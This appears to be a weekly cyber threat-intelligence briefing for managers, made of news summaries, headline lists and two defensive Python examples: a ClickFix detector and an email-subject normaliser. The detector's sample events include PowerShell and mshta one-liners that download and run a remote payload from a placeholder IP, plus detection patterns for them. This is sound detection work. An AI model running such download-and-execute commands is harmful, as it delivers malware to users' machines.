Source: https://www.techcentral.ie/smes-unprepared-to-defend-against-advanced-cyber-threats/

UK Financial Regulator to Focus on Cyber Defence

The Financial Conduct Authority (FCA) signalled a sharper focus on cyber defence and technology as part of its role in safeguarding national security. Speaking to City leaders, chief executive Nikhil Rathi argued that modern conflict hits balance sheets and markets as much as battlefields, and that the regulator must adapt accordingly. The speech pointed to bolstering operational resilience, tackling systemic tech risks and ensuring boards treat cyber as a strategic threat. Firms should expect closer scrutiny of preparedness and clearer expectations for governance, detection and recovery.

Source: https://www.uktech.news/news/government-and-policy/uk-financial-regulator-to-focus-on-cyber-defence-20251024

The 10 Biggest Issues CISOs and Cyber Teams Face Today

This piece outlines the pressures security leaders say are hardest right now. Priorities include securing AI infrastructure and data, simplifying sprawling toolsets, addressing talent burnout and budget constraints, and improving basic hygiene while preparing for high-impact incidents. The article stresses that AI use is outpacing guardrails, that misaligned incentives impede progress, and that boards seek clearer metrics tied to business outcomes. Leaders are urged to invest in automation, uplift human factors and embed cyber risk into enterprise decision making with repeatable reporting that executives can act on.

Source: https://www.csoonline.com/article/4077442/the-10-biggest-issues-cisos-and-cyber-teams-face-today-2.html

The Cyber Security Perception Gap: Why Executives and Practitioners See Security Differently

The article highlights a widening gap between executive confidence and practitioner reality. Frontline teams report tool complexity, alert fatigue and skills shortages, while leaders assume capabilities are stronger and incidents rarer than they are. The author says this misalignment leads to underfunded controls and delayed responses. Recommendations include rationalising tools, automating routine tasks and establishing common risk language and measures that map to resilience outcomes. Greater transparency on near misses and recovery times is urged so investment tracks real exposure rather than assumed maturity.

Source: https://thehackernews.com/2025/10/the-cybersecurity-perception-gap-why.html

Shadow AI: One In Four Employees Use Unapproved AI Tools, Research Finds

A 1Password report found that 27% of employees use AI tools not approved by their organisation, making shadow AI the second most common form of shadow IT after email. While 73% of workers say their company supports AI use, many bypass policies for convenience or productivity. Risks include data leakage, compliance breaches and malware. The report urges firms to maintain an AI tool inventory, define clear usage policies and limit access to authorised platforms to manage accumulated exposure risks.

Source: https://www.infosecurity-magazine.com/news/shadow-ai-employees-use-unapproved/

LinkedIn Phishing Targets Finance Execs With Fake Board Invites

A phishing campaign on LinkedIn is targeting finance executives with fake invitations to join an investment fund. Messages link to malicious sites that mimic LinkedIn and Microsoft login pages, stealing credentials and session cookies through an adversary-in-the-middle setup. Push Security reports that 34% of phishing attempts now occur outside email, up from under 10% three months ago. Attackers use CAPTCHA and Cloudflare Turnstile to evade scanners. Experts urge executives to verify unexpected LinkedIn messages and avoid clicking shared links.

Source: https://www.bleepingcomputer.com/news/security/linkedin-phishing-targets-finance-execs-with-fake-board-invites/

Social Engineering: Why the ClickFix Malware Attack Just Won’t Go Away

ClickFix remains stubborn because it persuades users to perform the risky action themselves, sidestepping many built-in protections. The article explains how browser prompts trick victims into copying and running commands that fetch malware, and describes FileFix as a related variant that uses File Explorer to trigger the same outcome. As the user initiates execution, technical controls may not trigger, so layered mitigations and user awareness are emphasised. The piece encourages stricter browser security policies and training that flags unusual copy-paste and command execution patterns.

Source: https://www.makeuseof.com/why-clickfix-malware-attack-just-wont-go-away/
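The story above says technical controls often stay quiet because the victim launches the command. One place the activity is still visible is process-creation telemetry: a script host started by the Run box, the File Explorer address bar (FileFix) or a browser, with a command line that fetches and runs a second stage. The detector below is an added example written for this briefing, not code from the linked article; the field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine), the events are constructed, and the interpreter list, patterns and scoring threshold are our own starting point rather than a vendor rule.

```python
import json
import re
from pathlib import PureWindowsPath

# Interpreters a ClickFix/FileFix lure asks the victim to launch by pasting
# text. (Assumption: our starting list, not a complete inventory.)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
# explorer.exe parents both the Win+R Run box (ClickFix) and the File
# Explorer address bar (FileFix), so on its own it is a weak signal.
INTERACTIVE_PARENTS = BROWSERS | {"explorer.exe"}

# Fragments typical of a pasted one-liner that fetches and runs a second
# stage; each hit adds one point to the score.
PAYLOAD_PATTERNS = {
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "web-download": re.compile(
        r"\birm\b|\biwr\b|invoke-restmethod|invoke-webrequest|downloadstring", re.I),
    "mshta-url": re.compile(r"\bmshta\b.*https?://", re.I),
    "encoded-command": re.compile(
        r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
}


def _exe(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def score_event(ev: dict) -> tuple[int, list[str]]:
    """Score one process-creation event; returns (score, reasons)."""
    child, parent = _exe(ev.get("Image", "")), _exe(ev.get("ParentImage", ""))
    if child not in SCRIPT_HOSTS or parent not in INTERACTIVE_PARENTS:
        return 0, []
    score, reasons = 1, [f"{child} spawned by {parent}"]
    if parent in BROWSERS:
        # A browser has no legitimate reason to start a script host.
        score, reasons = score + 2, reasons + ["parent is a browser"]
    for label, pattern in PAYLOAD_PATTERNS.items():
        if pattern.search(ev.get("CommandLine", "")):
            score += 1
            reasons.append(label)
    return score, reasons


def detect(log_lines, threshold: int = 3) -> list[dict]:
    """Return the events scoring at or above the threshold, with reasons."""
    hits = []
    for line in log_lines:
        ev = json.loads(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"score": score, "reasons": reasons,
                         "CommandLine": ev.get("CommandLine", "")})
    return hits


# Constructed events (not real telemetry), using Sysmon Event ID 1 field
# names: Image, ParentImage, CommandLine.
SAMPLE_EVENTS = [
    {   # ClickFix: pasted into Win+R; hidden window, fetch, Invoke-Expression
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'powershell -w hidden -c "irm http://198.51.100.7/x.txt | iex"',
    },
    {   # a browser spawning mshta with a URL
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "CommandLine": "mshta http://198.51.100.7/v.hta",
    },
    {   # an admin opening PowerShell from the Run box: same parent, no payload
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"powershell Get-ChildItem C:\Temp",
    },
    {   # ordinary browser child process
        "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "CommandLine": "chrome.exe --type=renderer",
    },
]
SAMPLE_LOG = [json.dumps(ev) for ev in SAMPLE_EVENTS]

if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(hit["score"], ", ".join(hit["reasons"]), "::", hit["CommandLine"])
```

The point of the scoring is that the parent alone is not enough: explorer.exe spawns PowerShell every time an administrator uses the Run box, so the third event stays below the threshold, while the first two are separated from it by the download-and-execute fragments and the browser parent. Tune the patterns and threshold against your own baseline before alerting on them.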

New Phishing Attack Using Invisible Characters Hidden in Subject Line

Researchers observed attackers inserting invisible characters into email subject lines that bypass automated filters while appearing normal to users. The technique mixes MIME encoding and Unicode soft hyphens so keyword-based systems miss risky terms. It underscores how social engineering adapts when controls focus on predictable patterns. The article advises updating filter logic to normalise subject strings, strengthening multi-factor authentication, and coaching staff to treat odd formatting as a red flag. It also highlights the need to monitor for anomalies in the way messages appear in different email applications.

Source: https://cybersecuritynews.com/new-phishing-attack-using-invisible-characters/
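The article's advice to normalise subject strings hides two separate steps: decode the RFC 2047 encoded-word first (a filter matching on the raw header only sees a base64 or quoted-printable blob), then remove the soft hyphens and other zero-width characters that survive decoding and split the keyword. The function below is an added example written for this briefing, not code from the article, and uses only the Python standard library; the sample subjects and the list of risky terms are constructed for illustration.

```python
import re
import unicodedata
from email.header import decode_header

# Terms the filter is meant to catch (assumption: an illustrative list).
RISKY_TERMS = ("invoice", "payment overdue", "password reset")


def decode_rfc2047(raw: str) -> str:
    """Decode MIME encoded-words (=?charset?B?...?= and =?charset?Q?...?=)."""
    parts = []
    for chunk, charset in decode_header(raw):
        if isinstance(chunk, bytes):
            chunk = chunk.decode(charset or "ascii", errors="replace")
        parts.append(chunk)
    return "".join(parts)


def strip_invisible(text: str) -> str:
    """Remove Unicode 'format' characters (general category Cf).

    The class contains the soft hyphen (U+00AD) named in the article as well
    as the zero-width space, joiner and non-joiner, word joiner and U+FEFF,
    all of which render as nothing but break substring matching.
    """
    return "".join(ch for ch in text if unicodedata.category(ch) != "Cf")


def normalize_subject(raw: str) -> str:
    """Canonical form for matching: decoded, NFKC-folded (fullwidth and other
    compatibility forms collapse to ASCII), invisibles removed, whitespace
    collapsed, case-folded."""
    text = decode_rfc2047(raw)
    text = unicodedata.normalize("NFKC", text)
    text = strip_invisible(text)
    text = " ".join(text.split())
    return text.casefold()


def is_risky(subject: str, normalize: bool = True) -> bool:
    """Keyword check; normalize=False shows what a naive filter sees."""
    text = normalize_subject(subject) if normalize else subject.casefold()
    return any(term in text for term in RISKY_TERMS)


# Constructed sample headers (not taken from the article):
SAMPLES = {
    # base64 encoded-word for "In\u00advoice" (soft hyphen between In and voice)
    "soft_hyphen_b64": "=?UTF-8?B?SW7CrXZvaWNl?= overdue",
    # Q-encoded "Pass\u200bword reset" (zero-width space; '_' is a space in Q)
    "zwsp_q": "=?UTF-8?Q?Pass=E2=80=8Bword_reset?=",
    "plain": "Your invoice is attached",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:16} raw-match={is_risky(raw, normalize=False)!s:5} "
              f"normalized-match={is_risky(raw)!s:5} -> {normalize_subject(raw)!r}")
```

Run stand-alone it shows the two encoded samples failing the raw check and passing the normalised one. Decoding alone is not enough: "In\u00advoice" still does not contain "invoice", which is why the Cf strip happens after the decode. Apply the same normalisation to display names and attachment names, which are encoded the same way.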

BT Warns of Soaring Cyber Threats Targeting UK Firms

BT reported a 300% surge in cyber surveillance, with UK businesses now scanned over 4,000 times daily for vulnerabilities. Professional services, retail, and hospitality sectors face the most ransomware activity, with smaller firms hardest hit. BT urges proactive measures to strengthen cyber resilience.

Source: https://www.lawnews.co.uk/cyber/bt-warns-of-soaring-cyber-threats/

Threats

Ransomware, Extortion and Destructive Attacks

Ransomware recovery perils: 40% of paying victims still lose their data | CSO Online

Insider Threats Loom while Ransom Payment Rates Plummet - Security Boulevard

QBE predicts 40% rise in ransomware incidents by 2026 | Insurance Times

1 in 4 SMEs face ransomware risk - Shelflife Magazine

New LockBit Ransomware Victims Identified by Security Researchers - Infosecurity Magazine

Why Britain is struggling to stop the ransomware cyberattacks | The Week

Qilin Ransomware Group Publishes Over 40 Cases Monthly - Infosecurity Magazine

Why ransomware group names don’t matter for defense | SC Media

Three Factors Determine Whether a Ransomware Group is Successful  - Security Boulevard

Ransomware Hackers Look for New Tactics Amid Falling Profits

Ransomware hackers are now running Linux encryptors in Windows to stay undetected | TechRadar

Preparing for the Digital Battlefield of 2026: Ghost Identities, Poisoned Accounts, & AI Agent Havoc

Russian Ransomware Gangs Weaponize Open-Source AdaptixC2 for Advanced Attacks

Cisco, Citrix and SonicWall VPNs connected to higher risk of ransomware infections | TechRadar

Uncovering Qilin attack methods exposed through multiple cases

Surprised, Not Surprised, Ransomware Attacks Have Ticked Up  - Security Boulevard

Some lower-tier ransomware gangs have formed a new RaaS alliance — or have they? (1) – DataBreaches.Net

28% of Irish businesses risk closure with one ransomware attack

Pulling the plug: A way to halt a cyber attacker in your network? | Computer Weekly

Next-gen firewalls, VPNs can increase security risks: At-Bay • The Register

180 ransomware attacks plague education sector worldwide in 2025 through Q3 | K-12 Dive

Ransomware Victims

The costliest cyber attack in UK history | PQ Magazine

New LockBit Ransomware Victims Identified by Security Researchers - Infosecurity Magazine

Russian hackers threaten Dublin Airport | Cybernews

More Collins Aerospace Hacking Fallout - InfoRiskToday

TCS denies losing UK’s Marks & Spencer contract over £300 million cyberattack - The Economic Times

Co-op staff told to boost promotion of vapes after costly cyber-attack, document shows | Co-operative Group | The Guardian

Sweden’s power grid operator confirms data breach claimed by ransomware gang | The Record from Recorded Future News

Qilin claims pharmacy benefit manager MedImpact | Cybernews

Ransomware gang claims Conduent breach: what you should watch for next | Malwarebytes

Phishing & Email Based Attacks

LinkedIn phishing targets finance execs with fake board invites

New Phishing Attack Uses Unique UUIDs to Bypass Secure Email Gateways

New CoPhish attack steals OAuth tokens via Copilot Studio agents

New Phishing Attack Using Invisible Characters Hidden in Subject Line Using MIME Encoding - Cyber Security News

The 10 biggest issues CISOs and cyber teams face today | CSO Online

Scammers try to trick LastPass users into giving up credentials by telling them they’re dead – Computerworld

Fake LastPass death claims used to breach password vaults

How we linked ForumTroll APT to Dante spyware by Memento Labs | Securelist

Emerging Cyber Threats Featuring QR Codes ClickFix and LOLBins Challenging SOC Defenses

KnowBe4 Uncovers Surged Abuse of Legitimate Platforms by Cybercriminals in 2025

Smishing Triad Linked to 194,000 Malicious Domains in Global Phishing Operation

9 in 10 Exchange servers in Germany are out of support • The Register

ClickFix Infrastructure Surprises Inform Better Blocking

Google disputes false claims of massive Gmail data breach

Other Social Engineering

LinkedIn phishing targets finance execs with fake board invites

This new malware attack just won't go away

The 10 biggest issues CISOs and cyber teams face today | CSO Online

Scammers try to trick LastPass users into giving up credentials by telling them they’re dead – Computerworld

Fake LastPass death claims used to breach password vaults

Emerging Cyber Threats Featuring QR Codes ClickFix and LOLBins Challenging SOC Defenses

Smishing Triad Linked to 194,000 Malicious Domains in Global Phishing Operation

Hackers Use AI to Supercharge Social Engineering Attacks

ClickFix Infrastructure Surprises Inform Better Blocking

BiDi Swap: The bidirectional text trick that makes fake URLs look real

Google study finds Android avoids 58% more spam and scam texts compared to iOS

ICO fines sole trader for allegedly sending 1M spam texts • The Register

Fraud, Scams and Financial Crime

UK Fraud Cases Surge 17% Annually - Infosecurity Magazine

Europol Warns of Rising Threat From Caller ID Spoofing Attacks - Infosecurity Magazine

A Quarter of Scam Victims Have Considered Self-Harm - Infosecurity Magazine

Google study finds Android avoids 58% more spam and scam texts compared to iOS

Investment Scams Spread Across Asia With International Reach - Infosecurity Magazine

Stragglers From Myanmar Scam Center Raided by Army Cross Into Thailand as Buildings are Blown Up - SecurityWeek

Artificial Intelligence

New CoPhish attack steals OAuth tokens via Copilot Studio agents

BSI Warns of Looming AI Governance Crisis - Infosecurity Magazine

AI browsers are the next big target for hackers - Cryptopolitan

AI chatbots are sliding toward a privacy crisis - Help Net Security

The 10 biggest issues CISOs and cyber teams face today | CSO Online

Hackers Use AI to Supercharge Social Engineering Attacks

Preparing for the Digital Battlefield of 2026: Ghost Identities, Poisoned Accounts, & AI Agent Havoc

Are AI browsers worth the security risk? Why experts are worried | ZDNET

Dark AI is fueling cybercrime — and accelerating the cybersecurity arms race - Big Think

AI writes code like a junior dev, and security is feeling it - Help Net Security

AI agents can leak company data through simple web searches - Help Net Security

Chatbots parrot Putin propaganda about Ukraine invasion • The Register

Your photo could be all AI needs to clone your voice - Help Net Security

One In Four Employees Use Unapproved AI Tools, Research Finds - Infosecurity Magazine

Get your news from AI? Watch out - it's wrong almost half the time | ZDNET

AI Search Tools Easily Fooled by Fake Content

First Zero Click Attack Exploits MCP and Connected Popular AI Agents To Exfiltrate Data Silently

One week to opt out or be fodder for LinkedIn AI training • The Register

2FA/MFA

X: Re-enroll 2FA security keys by November 10 or get locked out

Malware

This new malware attack just won't go away

Emerging Cyber Threats Featuring QR Codes ClickFix and LOLBins Challenging SOC Defenses

Infostealers Run Wild - DataBreachToday

Hackers steal Discord accounts with RedTiger-based infostealer

Hackers weaponize Telegram messenger with malware to gain system control - Cryptopolitan

Malicious NPM packages fetch infostealer for Windows, Linux, macOS

PhantomRaven Malware Found in 126 npm Packages Stealing GitHub Tokens From Devs

Defenses Need to Adapt, Because the Malware Already Did

DDoS, data theft, and malware are storming the gaming industry - Help Net Security

Bots/Botnets

Botnets Step Up Cloud Attacks Via Flaws, Misconfigs

Experts Report Sharp Increase in Automated Botnet Attacks Targeting PHP Servers and IoT Devices

Mobile

Android malware uses random text delays to look more human • The Register

Massive surge of NFC relay malware steals Europeans’ credit cards

Hackers weaponize Telegram messenger with malware to gain system control - Cryptopolitan

Europol Warns of Rising Threat From Caller ID Spoofing Attacks - Infosecurity Magazine

Google study finds Android avoids 58% more spam and scam texts compared to iOS

MPs urge UK government to stop phone theft wave through tech • The Register

Why the 5G symbol on your phone doesn't mean you actually have 5G - BBC News

iOS 26 Deletes Pegasus and Predator Spyware Infection Evidence by Overwriting The ‘shutdown.log’ file on Reboot

Denial of Service/DoS/DDoS

Security hole slams Chromium browsers - no fix yet • The Register

DDoS, data theft, and malware are storming the gaming industry - Help Net Security

Russian Rosselkhoznadzor hit by DDoS attack, food shipments across Russia delayed

Internet of Things – IoT

Experts Report Sharp Increase in Automated Botnet Attacks Targeting PHP Servers and IoT Devices

How neighbors could spy on smart homes - Help Net Security

Data Breaches/Leaks

Infamous Cybercriminal Forum BreachForums Is Back Again With A New Clear Net Domain

List of Oracle EBS Attack Victims May Be Growing Longer

EY exposed 4TB SQL backup file to open web, researchers say • The Register

Hackers steal Discord accounts with RedTiger-based infostealer

F5 asserts limited impact from prolonged nation-state attack on its systems | CyberScoop

Hackers Allegedly Claim Breach Of HSBC USA Customers' Records Including Financial Details

Human impact of UK's Afghan data disaster revealed to MPs • The Register

When 183 Million Passwords Leak: How One Breach Fuels a Global Threat Chain - Security Boulevard

Email breaches are the silent killers of business growth - Help Net Security

First Zero Click Attack Exploits MCP and Connected Popular AI Agents To Exfiltrate Data Silently

Ransomware gang claims Conduent breach: what you should watch for next | Malwarebytes

No, Gmail has not suffered a massive 183 million passwords breach - but you should still look after your data | TechRadar

What to Do About the Massive Gmail Password Data Leak

Marketing giant Dentsu warns staff after Merkle data raid • The Register

Hackers steal data of fashion retailer Mango’s customers • Graham Cluley

DDoS, data theft, and malware are storming the gaming industry - Help Net Security

Iran’s MOIS-linked Ravin Academy hit by data breach • The Register

UK lotto players land data jackpot thanks to website error • The Register

Organised Crime & Criminal Actors

Infamous Cybercriminal Forum BreachForums Is Back Again With A New Clear Net Domain

UK Fraud Cases Surge 17% Annually - Infosecurity Magazine

Insider Threats Loom while Ransom Payment Rates Plummet - Security Boulevard

72 states sign first global UN Convention against Cybercrime - Help Net Security

Europol Warns of Rising Threat From Caller ID Spoofing Attacks - Infosecurity Magazine

Two U.K. teenagers appear in court over Transport for London cyber attack – DataBreaches.Net

UN Cybercrime Treaty wins dozens of signatories • The Register

Insider Risk and Insider Threats

Insider Threats Loom while Ransom Payment Rates Plummet - Security Boulevard

Insider Threat Prevention - Security Boulevard

Data on Insider Threats Reveal Hidden Risk Patterns

Insurance

Cyber insurance demand rises as global tensions fuel surge in digital threats - BetaNews

New threats spike cyber insurance surge

Supply Chain and Third Parties

Do CISOs need to rethink service provider risk? | CSO Online

NYSDFS Guidance on Managing Risks to Third-Party Service Provider

Google Investigates Weekslong Security Breach Involving Contractor — The Information

UK leads global fight to stop ransomware attacks on supply chains - GOV.UK

Cloud/SaaS

Botnets Step Up Cloud Attacks Via Flaws, Misconfigs

When it Rains it Pours: Lessons for Businesses Following the AWS Service Disruption | Baker Donelson - JDSupra

Microsoft: DNS outage impacts Azure and Microsoft 365 services

No, Gmail has not suffered a massive 183 million passwords breach - but you should still look after your data | TechRadar

What to Do About the Massive Gmail Password Data Leak

Germany issues hacked account checklist | Cybernews

Microsoft sued for allegedly tricking millions into Copilot M365 subscriptions

Microsoft Security Change for Azure Creates Pitfalls

Outages

When it Rains it Pours: Lessons for Businesses Following the AWS Service Disruption | Baker Donelson - JDSupra

Microsoft: DNS outage impacts Azure and Microsoft 365 services

Identity and Access Management

Active Directory at Risk Due to Domain-Join Account Misconfigurations

Encryption

Chrome to Make HTTPS Mandatory by Default in 2026 - Infosecurity Magazine

"It’s not about security, it’s about control" – How EU governments want to encrypt their own comms, but break our private chats | TechRadar

Linux and Open Source

Ransomware hackers are now running Linux encryptors in Windows to stay undetected | TechRadar

Ubuntu’s Kernel Vulnerability Let Attackers Escalate Privileges and Gain Root Access

Ultimate Guide to Open Source Security: Risks, Attacks & Defenses - Security Boulevard

Why open source may not survive the rise of generative AI | ZDNET

Passwords, Credential Stuffing & Brute Force Attacks

When 183 Million Passwords Leak: How One Breach Fuels a Global Threat Chain - Security Boulevard

Cybercriminals Trade 183 Million Stolen Credentials on Telegram, Dark Forums - SecurityWeek

Social Media

LinkedIn phishing targets finance execs with fake board invites

Germany issues hacked account checklist | Cybernews

X: Re-enroll 2FA security keys by November 10 or get locked out

One week to opt out or be fodder for LinkedIn AI training • The Register

Regulations, Fines and Legislation

UK financial regulator to focus on cyber defence - UKTN

"It’s not about security, it’s about control" – How EU governments want to encrypt their own comms, but break our private chats | TechRadar

Government Shutdown Creates Lapse in Cyber Threat Information Sharing | Alston & Bird - JDSupra

Shutdown Sparks 85% Increase in US Gov't Cyberattacks

US cybersecurity progress is 'slipping,' report warns | American Banker

72 states sign first global UN Convention against Cybercrime - Help Net Security

UN Cybercrime Treaty wins dozens of signatories • The Register

Navigating EMEA Regulatory Compliance for Critical Infrastructure | IT Pro

Navigating NIS2: What Organisations Need to Know as EU Implementation Unfolds | Goodwin - JDSupra

ICO fines sole trader for allegedly sending 1M spam texts • The Register

New York’s Cyber Rules Ramp Up Pressure on Security Officers

Models, Frameworks and Standards

Navigating NIS2: What Organisations Need to Know as EU Implementation Unfolds | Goodwin - JDSupra

Careers, Working in Cyber and Information Security

Cyber Pros Needed: Securing the Middle Ground

Cross-border cooperation can help to tackle global cyber talent shortage

‘You can be an ethical hacker, not a criminal one’: the initiative guiding young gamers into cybersecurity | From Play To Purpose | The Guardian

Top tips to prepare for a cybersecurity job interview

Law Enforcement Action and Take Downs

Infamous Cybercriminal Forum BreachForums Is Back Again With A New Clear Net Domain

Two U.K. teenagers appear in court over Transport for London cyber attack – DataBreaches.Net

72 states sign first global UN Convention against Cybercrime - Help Net Security

UN Cybercrime Treaty wins dozens of signatories • The Register

Europol Warns of Rising Threat From Caller ID Spoofing Attacks - Infosecurity Magazine

Stragglers From Myanmar Scam Center Raided by Army Cross Into Thailand as Buildings are Blown Up - SecurityWeek

Ex-US cyber intel exec pleads guilty to selling spy tools to Russian broker | Reuters

Misinformation, Disinformation and Propaganda

Chatbots parrot Putin propaganda about Ukraine invasion • The Register

Millions shown fake news about the state pension by Google


Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

How China really spies on the UK in 2025 - BBC News

‘I am not a robot’: Russian hackers use fake CAPTCHA lures to deploy espionage tools | CSO Online

Shifting from reactive to proactive: Cyber resilience amid nation-state espionage | CyberScoop

Suspected Chinese snoops weaponize unpatched Windows flaw • The Register

Diplomatic entities in Belgium and Hungary hacked in China-linked spy campaign | The Record from Recorded Future News

New corporate espionage claims emerge, centered on two highly valued 401(k) admin startups | TechCrunch

Nation State Actors

China

How China really spies on the UK in 2025 - BBC News

F5 asserts limited impact from prolonged nation-state attack on its systems | CyberScoop

CISA Flags VMware Zero-Day Exploited by China-Linked Hackers in Active Attacks

Suspected Chinese snoops weaponize unpatched Windows flaw • The Register

Diplomatic entities in Belgium and Hungary hacked in China-linked spy campaign | The Record from Recorded Future News

Britain Needs China’s Money. It Fears What Comes With It. - The New York Times

Defence lawyers would have used Tories’ statements to dismiss China spy case, attorney general says | Espionage | The Guardian

US company with access to biggest telecom firms uncovers breach by nation-state hackers | Reuters

China-linked hackers exploit patched ToolShell flaw to breach Middle East telecom

US Government Urges Total Ban of Our Most Popular Wi-Fi Router - CNET

Russia

‘I am not a robot’: Russian hackers use fake CAPTCHA lures to deploy espionage tools | CSO Online

Sanctions won’t stop cyberattacks, but they can still "bite" - Help Net Security

Chatbots parrot Putin propaganda about Ukraine invasion • The Register

Russian Ransomware Gangs Weaponize Open-Source AdaptixC2 for Advanced Attacks

Nation-State Cyber Ecosystems Weakened by Sanctions, Report Reveals - Infosecurity Magazine

Ukraine strengthens its cyberterrorism response system - National Security and Defense Council of Ukraine

Russian hackers, likely linked to Sandworm, exploit legitimate tools against Ukrainian targets

Ex-US cyber intel exec pleads guilty to selling spy tools to Russian broker | Reuters

NBC Weapons: Russia Resorts to Chemical Warfare

Russian Rosselkhoznadzor hit by DDoS attack, food shipments across Russia delayed

Iran

Iran’s MOIS-linked Ravin Academy hit by data breach • The Register

North Korea

North Korean Hackers Attacking Unmanned Aerial Vehicle Industry to Steal Confidential Data

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

APT36 Targets Indian Government with Golang-Based DeskRAT Malware Campaign

SideWinder Hacking Group Uses ClickOnce-Based Infection Chain to Deploy StealerBot Malware

How we linked ForumTroll APT to Dante spyware by Memento Labs | Securelist

Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware




Vulnerability Management

The State of Exposure Management in 2025: Insights From 3,000+ Organizations

Ultimate Guide to Open Source Security: Risks, Attacks & Defenses - Security Boulevard

9 in 10 Exchange servers in Germany are out of support • The Register

NHS quarantines devices as suppliers drag feet on Windows 11 • The Register

Vulnerabilities

List of Oracle EBS Attack Victims May Be Growing Longer

Microsoft Issues Emergency Patch for Windows Server Bug

CVE-2025-59287: Microsoft fixes critical WSUS flaw under active attack

Microsoft WSUS attacks hit 'multiple' orgs, Google warns • The Register

CISA Flags VMware Zero-Day Exploited by China-Linked Hackers in Active Attacks

Suspected Chinese snoops weaponize unpatched Windows flaw • The Register

Ubuntu’s Kernel Vulnerability Let Attackers Escalate Privileges and Gain Root Access

Multiple Oracle VM VirtualBox Vulnerabilities Enable Complete Takeover of VirtualBox

Year-Old WordPress Plugin Flaws Exploited to Hack Websites - SecurityWeek

Apache Tomcat Security Vulnerabilities Expose Servers to Remote Code Execution Attacks

OpenVPN Vulnerability Exposes Linux, macOS Systems to Script Injection Attacks

New "Brash" Exploit Crashes Chromium Browsers Instantly with a Single Malicious URL

Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware

Security hole slams Chromium browsers - no fix yet • The Register

Chrome 0-Day Vulnerability Actively Exploited in Attacks by Notorious Hacker Group

QNAP warns of critical ASP.NET flaw in its Windows backup software


Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

·       Automotive

·       Construction

·       Critical National Infrastructure (CNI)

·       Defence & Space

·       Education & Academia

·       Energy & Utilities

·       Estate Agencies

·       Financial Services

·       FinTech

·       Food & Agriculture

·       Gaming & Gambling

·       Government & Public Sector (including Law Enforcement)

·       Health/Medical/Pharma

·       Hotels & Hospitality

·       Insurance

·       Legal

·       Manufacturing

·       Maritime & Shipping

·       Oil, Gas & Mining

·       OT, ICS, IIoT, SCADA & Cyber-Physical Systems

·       Retail & eCommerce

·       Small and Medium Sized Businesses (SMBs)

·       Startups

·       Telecoms

·       Third Sector & Charities

·       Transport & Aviation

·       Web3


Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to external articles are provided for general interest and awareness only. Linking to or reposting external content does not constitute endorsement of or by any organisation, service, or product. We do not control and are not responsible for the content, security, or availability of external websites or links. Full credit is given to the original authors and sources. E&OE.


Black Arrow Cyber Threat Intelligence Briefing 24 October 2025

Black Arrow Cyber Threat Intelligence Briefing 24 October 2025:

-GCHQ Says Boards Must Understand Cyber Risks and Prepare for Attacks That Get Through

-Study Reveals Cyber Confidence Often Misaligned with Reality

-Threat Actors Exploiting Faster Than Businesses Can Respond

-Millions Still Use One Password Across Multiple Accounts

-Microsoft Warns of Sharp Rise in Identity Attacks Driven by Password Theft

-Insider Risks Cause Data Loss in 77% of Organisations

-AI-Driven Threats Are Top Concern for Cyber Professionals in 2026

-Infostealers Are Reshaping the Cyber Security Landscape

-How ClickFix Attackers Trick You to Attack Yourself and Bypass Your Security

-Business Confidence in Ransomware Defence Is High, But Readiness Is Low

-Ransomware Payouts Surge to $3.6M in Recent Cases

-Third-Party Breaches Escalate as Confidence Gap Widens Among Cyber Leaders

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Executive Summary

This week, the head of GCHQ has urged businesses to ensure their boards include members who understand cyber risks and can ask the right questions, while a new report highlights that many organisations are misaligned in their perception of cyber security strength versus actual security.

We also include a reminder about one of the most basic cyber controls: passwords. Millions of users have a single password for multiple accounts, and Microsoft warns of a rise in attacks driven by password theft. Our other insights include attackers exploiting vulnerabilities within days and using AI to scale their impact, the rising threat of ransomware, and the broader consequences of business leaders not recognising the gaps in their defences including the importance of testing incident response plans.

Responding to the above GCHQ call to action, contact us to learn how we support our client boards in their cyber governance and compliance. We join regular board meetings to lead the conversation on progress in building stronger and proportionate cyber security, while upskilling board members to support continuous development.


Top Cyber Stories of the Last Week

GCHQ Says Boards Must Understand Cyber Risks and Prepare for Attacks That Get Through

The head of GCHQ has urged UK companies to prepare for inevitable cyber-attacks by developing contingency plans that include offline crisis protocols. Speaking at a cyber security conference, Anne Keast-Butler stressed that boards must include members who understand cyber risks and can ask the right questions. She highlighted the increasing frequency of significant attacks and the role of AI in lowering the barrier for malicious actors. The National Cyber Security Centre reported a sharp rise in major incidents, and underscored the need for rehearsed response strategies by leadership teams.

